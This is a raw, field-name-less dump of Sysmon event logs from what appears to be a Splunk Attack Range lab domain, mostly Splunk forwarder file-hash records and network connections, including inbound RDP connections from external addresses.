AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53382-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000979081Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:07.985{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E49D0235DB7DE2F2666BCDFF488F1767,SHA256=B3AEFE1D66E9F1563EF11B64354A4062B5774B6EF14917E293AA613A5F74CD44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050464Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:07.805{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF142F625F3FA07662F82418F7EEE591,SHA256=D7C855916522795B3A3607962DDFFFA40F4C202C07A2D1BBEFC0652DDEC022EC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979080Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:03.783{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59399-false10.0.1.12-8000- 354300x80000000000000001050463Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:06.000{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53383-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 23542300x80000000000000001050462Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:07.337{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93598D8B307A37B16B2FA2754286851F,SHA256=0BB0087C6132DCEFFD9C3971E1BC1362F3CCF8744E82CA05B93A716FFD4973E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050466Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:08.820{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F797FC1445233C7D3CE00BB6572C90FE,SHA256=C1438D5AA0F53EE7B7622D3EF17DEED29DBABD73600C8202B4C541BC8629D397,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050465Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:06.000{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53383-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 23542300x80000000000000001050468Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:09.835{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1589986727024643860B915E9E924FB,SHA256=599A2F70C661720E49F18771D7D4E02C0CBD5C239C533554FE90A8A194720FC1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979084Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:06.225{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50673-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979083Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:09.173{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9115846000292DEA960BCEDC193D6894,SHA256=E4E550C119646BBCCE4B15EFC292AF71D3632F7856590C1CC3AD40E9AF42FA60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979082Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:09.001{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6A212C0A6C6210251A6C214FF90DE84,SHA256=830B40ECFFFC962D493B891C7D1774D72B905091219BB476E10CFFA1B062D3B8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050467Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:06.095{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com46389-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050469Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:10.850{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDF4F28F2E38C35DE44A3EDB811DD6E1,SHA256=3373A601E3994E9FDD9EB74EB0555CADFF9671C8525C8D53FE32A389BECE0D26,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979087Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:07.458{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54609-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979086Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:07.415{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51498-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979085Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:10.235{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=694A01546602340315A55AAF358A0458,SHA256=2DD1867433C9B21A50FFE925532FBF9A5073493879D2B66B708045A4219A3697,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050470Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:11.883{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02F194F974545CD8B16F4B145F1EA83A,SHA256=9878E583F8CBE76E6A4C201696F1E38FAB65203D123FF20C4F9E4BBCB975B0B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979089Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:11.391{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F60FE249F39B67FD689E93FDDC3ECF3,SHA256=9A53C02A33287CF7EC0845B8C4D89509C53E43A4C246377BC47F5DD254187B64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979088Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:11.235{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6B3926760F4CFCEDFE71D88E6340A07B,SHA256=2157E3CA72C6A2A7B5C6170700AD9B73E7C6F8B08984EFFC639153BBD10D96E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050473Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:12.948{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F833798983FFE1B127C986BB97A9B3E0,SHA256=D0176E85DDE2F5B980D44A3F18413117CEF8206D058C729535FC84D3DA22272F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979091Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:09.736{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59400-false10.0.1.12-8000- 23542300x8000000000000000979090Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:12.407{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CFE2D1D2FB2D2099C71FF9A8CB0D9A7,SHA256=7674DBD133D0AF1263EE8EFDCFEF5F51CA84501D86E9B23463E1E6BC1DFE33FA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050472Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:12.733{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001050471Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:09.795{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53384-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000979093Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:13.704{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979092Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:13.407{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D4E237E732359840B6DBD824FF26A4B,SHA256=BA56B7DAF5B4AFEB65E0D93E4C40C2C13EB81DA6A16CDCB1E7D0CEFEAD8605FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979094Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:14.407{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E886E46C176376B28CC1C46DA9BA73E7,SHA256=9F4834C7140AA6DDBB3EFA63F990A6F547380A36AAE59437B834EA61469F4963,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050477Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:14.535{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=352052768C6F96E00D120E8B1D77ABF1,SHA256=2FF7F688F01A4D8169ADBB7C7EF9633485922AB32BE6BB4136C8D00C86A4C3A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050476Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:14.535{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4686DAF4CD0D7282DB84D058C9CBFAE7,SHA256=8B8EAB28C311065426983317A76741F455CDF360E47D5E9C17BBFB7D83E95174,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050475Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:12.709{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-54123-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050474Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:14.051{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C71D686768B2E4C34A021173C7C2B863,SHA256=FAB9D9C5C5CC0A4B52E0FE9EE2C8534F3BA7218C674B9778C574B1C740573EA3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979096Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:12.330{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59401-false10.0.1.12-8089- 23542300x8000000000000000979095Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:15.423{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DFFB8209E5498FD4D155BC6D3E2B752,SHA256=974E9D289D91F8EB8DD641D42B8C8BF0FD77DAA4AE5CB923547C7DC24408C3C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050480Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:15.704{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=352052768C6F96E00D120E8B1D77ABF1,SHA256=2FF7F688F01A4D8169ADBB7C7EF9633485922AB32BE6BB4136C8D00C86A4C3A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050479Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:13.566{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-64138-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050478Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:15.066{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B4EC11C2051B5B49938C7D74FC6B517,SHA256=6DF486592D83543F8C80952078C5FD66A00BEF98679D1786837432519061E2D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979097Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:16.438{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4524B5B66C87A87039A84CCBFD2AE20B,SHA256=71120382F31A7A4078BBFE525D284DE6B4CA89666E9E68C7E8A7C92D2D46B261,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050481Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:16.085{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E3DDE92FA736FD8719C77EE48A55DD4,SHA256=21D587FBF1A99B29B39A5EA6D533D61A0BA11205FB330D2D902FBA373B64ED32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979098Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:17.438{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64D11B6991A7FE1651D971FB9F2D7E8E,SHA256=C35E3870C840FF14D79518D80B4F6757AA9F3808B13E3D65FDD5F199856A165C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050484Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:15.773{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53385-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050483Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:17.385{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3F2B5334D0108CEDF6DC6614CD7E998,SHA256=02B651E0243CC91EF07AD15D66BE04C0255D56D613290909AA39AA3BCAAB963E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050482Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:17.103{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17137AC1F76EB3102F9B9473A7CAEAA9,SHA256=A601FAA7C6C125E01BCD8C0B28889D0436B484E66ADD1BEF7DEC5DEB6F7A8125,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979100Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:14.877{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59402-false10.0.1.12-8000- 23542300x8000000000000000979099Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:18.438{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=792162472B18B9BCC0DFE9804E042A3A,SHA256=C88AC3613809105E26C52C757776D6DEA5B7A3DBBE1EFE4FBDA1A438FD467E2F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050488Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:16.058{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53386-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001050487Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:16.058{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53386-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001050486Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:15.907{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60354-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050485Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:18.118{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22300736AA38F6CDEF58DDD198733FCB,SHA256=4DBE1D329AC785FF96AC791A2BB51F44BB0362D68031DCC61D781548E6E3DC53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979101Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:19.454{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=160C5F299AA219A17B3C23FC1ECB0E91,SHA256=2A9BBC752D4BD019CBD4C4E4A990463E296D12BEC1A7AAE73A6DCCFCCBBD6B07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050489Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:19.119{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA5781F3C43F8134542FCF5A509065B3,SHA256=14503178BB3F9FECA4B5BD7AD24B59AFD0F29EA434FEF6AC23FAAAF054466EB1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979103Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:17.989{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de53129-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979102Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:20.469{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBF04A489CB6C019AE5D050F82C5B231,SHA256=32D3F63D9D50F29F5DB9093CD7D1A9FE04589A1AC4AA3A137F82286A359A84E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050490Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:20.134{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F826FC307FD27ECB697C7EE4512D9ED3,SHA256=3B674A528CD8EBB702198437E41DB0D3954296DA534EBFBBA0133BA8D94FBBAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979106Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:21.579{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCFE5C3240E918AFA2A17B243E1E9387,SHA256=E30F391B2FE24D2D6F0E818B5FA4AFE4A545B1CF176D13826EC188604AC1A4EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979105Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:21.579{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1ABBC6F0CAED112ACE5F65A345680A40,SHA256=A20803DFAC4B869EA38E4CBA0C51BD2331CF2D6C70CD59F5214D326E3F23EFF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979104Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:21.469{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 